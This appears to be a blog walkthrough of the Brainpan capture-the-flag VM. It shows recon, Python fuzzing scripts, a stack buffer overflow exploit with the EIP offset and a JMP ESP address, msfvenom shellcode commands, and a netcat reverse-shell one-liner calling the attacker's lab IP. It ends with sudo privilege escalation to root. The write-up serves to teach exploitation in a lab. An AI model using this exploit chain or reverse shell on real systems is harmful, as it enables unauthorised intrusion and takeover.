Following is the outcome of my hacking handiwork and obtaining root. Withour further delay, let’s start the party.
nmap -sV -sT -v -p- -T4 192.168.56.1/24
- custom application running in Wine on port 9999
- python SimpleHTTPServer on port 10000
Nikto might be helpful at this moment
nikto -h 192.168.56.106
It tells us about the mysterious
bin directory. Let’s browse the website and look inside it:
A suspicious app binary is waiting there for us – maybe it’s the key for solving this puzzle?
We won’t know unless we check it out. Let’s run the
strings command to view the hardcoded strings within the binary
shitstorm line instantly draws the attention – it may be a password to a certain service! We are gonna give it a try:
It looks useless. I also used telnet but still nothing, the application responded with the following: Connection closed by foreign host.
The app behaves as if it were a kind of a server. After opening the socket it waits for connection, checks the input and then drops.
2. Some scripting & fuzzing
Preinstalled Immunity Debugger on Windows 32-bit VM may come in handy here.
In the first round we’re gonna send a long, repeated string of A’s with a simple fuzzer visible below. By running the script, the terminal will tell us whether providing sufficiently long input can crash the app:
import socket for i in range(30): s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) s.connect(("192.168.56.105",9999) # mind to change the IP address :-) payloaod = int(i)*("A"*100) s.send(payload+"\r\n") print "[*] Sending buffer data with " + str(len(str(payload))) + " A's\r\n" s.close()
Running the code provides us with the following output:
Turns out that the overflow occurs around the length of 900 A’s.
In Immunity we notice that the EIP has been overwritten with 41414141 (ASCII representation of four A’s). It also says that an Access violation occurs while executing the code at address 41414141.
3. Finding EIP location
As the vulnerability is known and it’s obvious that we’ve gained control over replacing the EIP address, it brings us closer to our goal.
Firstly, we need to find the offset that could control the EIP. We’re gonna utilize a Metasploit feature and create a pattern consisting of a set of unique, three-character substrings:
It spits out a unique and random set that perfectly fits to our payload.
import socket s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.56.105',9999)) payload = ("Put the pattern here") print s.recv(1024) s.send(payload) print s.recv(1024) s.close()
Execution of the script causes Access violation again and leads to crash:
As you can see above, the pattern inside the EIP is 35724134
After having the pattern located inside the instruction pointer (EIP), let’s determine the offset (known as the exact location of the address) and make it point to our malicious shellcode, which we will craft later on.
ruby pattern_offset.rb -q 35724134
Exactly 524 bytes of junk data is needed to get us to the EIP.
Now our payload will look like this:
import socket s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.56.105',9999)) payload = "A"*524 + "B"*4 + "C"*(900-524-4) print s.recv(1024) s.send(payload+"\r\n") print s.recv(1024) s.close()
After executing this script the EIP gets overwritten with 42424242 (the ASCII code of „B” is 0x42)
Setting JMP ESP address
!mona jump -r ESP
Quick glance and we see something helpful:
0x31170000<- module with no SafeSEH and ASLR protection
And we find the JMP ESP address
4. Shellcode payload and reverse shell
- Brainpan’s IP – 192.168.56.106
- Attacker’s IP – 192.168.56.101
- Windows IP – 192.168.56.105
msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f c -b "\x00"
import socket buf = ("\xb8\xf9\...\...\...\..." "\xc9\xb1\...\..\...\...\...\..." "... "... ... "\x..\x..\x..\x..") payload = "A"*524 + "\xf3\x12\x17\x31" + "\x90"*16 + buf s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect(('192.168.56.106',9999)) except: print "Error" sys.exit(0) s.recv(1024) s.send(payload)
It was really confusing at first. Notice the CMD 1.4.1 label? This is because the windows executable is running through Wine on a Linux machine. Time to switch to Linux shell.
msfvenom -p linux/x86/exec CMD="mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f" -b "\x00" -f py
…and swap the shellcode in our python script after setting up the netcat once again.
5. Privilege escalation
Good, we’re back in the game! Spawning a tty shell -> check
id -> list the directory
ls -la ->
cat checksrv.sh -> and check the local users
cat passwd ->
cd /opt ->
ls -la sudoers
sudo /home/anansi/bin/anasi_util manual /etc/sudoers
!/bin/bash And finally!
It is a great opportunity to improve:
- understanding of buffer overflow,
- scripting skills,
- fundamentals of Immunity Debugger,
Hope it was useful 🙂